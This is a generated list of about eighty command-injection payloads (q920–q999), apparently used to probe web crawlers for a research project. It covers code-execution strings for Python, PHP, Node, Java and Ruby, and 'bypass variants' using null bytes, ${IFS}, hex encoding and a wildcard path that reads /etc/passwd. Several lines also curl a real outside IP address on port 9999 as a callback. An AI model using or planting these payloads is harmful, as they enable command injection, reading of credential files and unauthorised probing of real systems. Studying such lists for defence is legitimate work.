q920 [Lang] cmd=__import__('os').system('echo q920')
q921 [Lang] val=eval('__import__("os").popen("id").read()')
q922 [Lang] x=system('echo q922')
q923 [Lang] data=passthru('echo q923')
q924 [Lang] ref=<?php system('echo q924'); ?>
q925 [Lang] exec=`echo q925`
q926 [Lang] cmd=%x(echo q926)
q927 [Lang] val=system('echo q927')
q928 [Lang] data=require('child_'+'process').exec('echo q928')
q929 [Lang] cmd=Runtime.getRuntime().exec('echo q929')
q930 [Lang] cmd=__import__('os').system('echo q930')
q931 [Lang] val=eval('__import__("os").popen("id").read()')
q932 [Lang] x=system('echo q932')
q933 [Lang] data=passthru('echo q933')
q934 [Lang] ref=<?php system('echo q934'); ?>
q935 [Lang] exec=`echo q935`
q936 [Lang] cmd=%x(echo q936)
q937 [Lang] val=system('echo q937')
q938 [Lang] data=require('child_'+'process').exec('echo q938')
q939 [Lang] cmd=Runtime.getRuntime().exec('echo q939')
q940 [Lang] cmd=__import__('os').system('echo q940')
q941 [Lang] val=eval('__import__("os").popen("id").read()')
q942 [Lang] x=system('echo q942')
q943 [Lang] data=passthru('echo q943')
q944 [Lang] ref=<?php system('echo q944'); ?>
q945 [Lang] exec=`echo q945`
q946 [Lang] cmd=%x(echo q946)
q947 [Lang] val=system('echo q947')
q948 [Lang] data=require('child_'+'process').exec('echo q948')
q949 [Lang] cmd=Runtime.getRuntime().exec('echo q949')

Exotic / Bypass Variants

q950 [Exotic] val=echo q950
q951 [Exotic] cmd=%00echo q951
q952 [Exotic] data=echo q952
q953 [Exotic] test=%u0000echo q953
q954 [Exotic] x=echo q954
q955 [Exotic] name=echo${IFS}q955
q956 [Exotic] val=;echo${IFS}q956
q957 [Exotic] ref=/???/??t /???/p??s??
q958 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q958'
q959 [Exotic] data=curl 62.84.182.119:9999/q959
q960 [Exotic] val=echo q960
q961 [Exotic] cmd=%00echo q961
q962 [Exotic] data=echo q962
q963 [Exotic] test=%u0000echo q963
q964 [Exotic] x=echo q964
q965 [Exotic] name=echo${IFS}q965
q966 [Exotic] val=;echo${IFS}q966
q967 [Exotic] ref=/???/??t /???/p??s??
q968 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q968'
q969 [Exotic] data=curl 62.84.182.119:9999/q969
q970 [Exotic] val=echo q970
q971 [Exotic] cmd=%00echo q971
q972 [Exotic] data=echo q972
q973 [Exotic] test=%u0000echo q973
q974 [Exotic] x=echo q974
q975 [Exotic] name=echo${IFS}q975
q976 [Exotic] val=;echo${IFS}q976
q977 [Exotic] ref=/???/??t /???/p??s??
q978 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q978'
q979 [Exotic] data=curl 62.84.182.119:9999/q979
q980 [Exotic] val=echo q980
q981 [Exotic] cmd=%00echo q981
q982 [Exotic] data=echo q982
q983 [Exotic] test=%u0000echo q983
q984 [Exotic] x=echo q984
q985 [Exotic] name=echo${IFS}q985
q986 [Exotic] val=;echo${IFS}q986
q987 [Exotic] ref=/???/??t /???/p??s??
q988 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q988'
q989 [Exotic] data=curl 62.84.182.119:9999/q989
q990 [Exotic] val=echo q990
q991 [Exotic] cmd=%00echo q991
q992 [Exotic] data=echo q992
q993 [Exotic] test=%u0000echo q993
q994 [Exotic] x=echo q994
q995 [Exotic] name=echo${IFS}q995
q996 [Exotic] val=;echo${IFS}q996
q997 [Exotic] ref=/???/??t /???/p??s??
q998 [Exotic] cmd=$'\x65\x63\x68\x6f'$'\x20q998'
q999 [Exotic] data=curl 62.84.182.119:9999/q999

Generated for gematria.online crawler behavior research.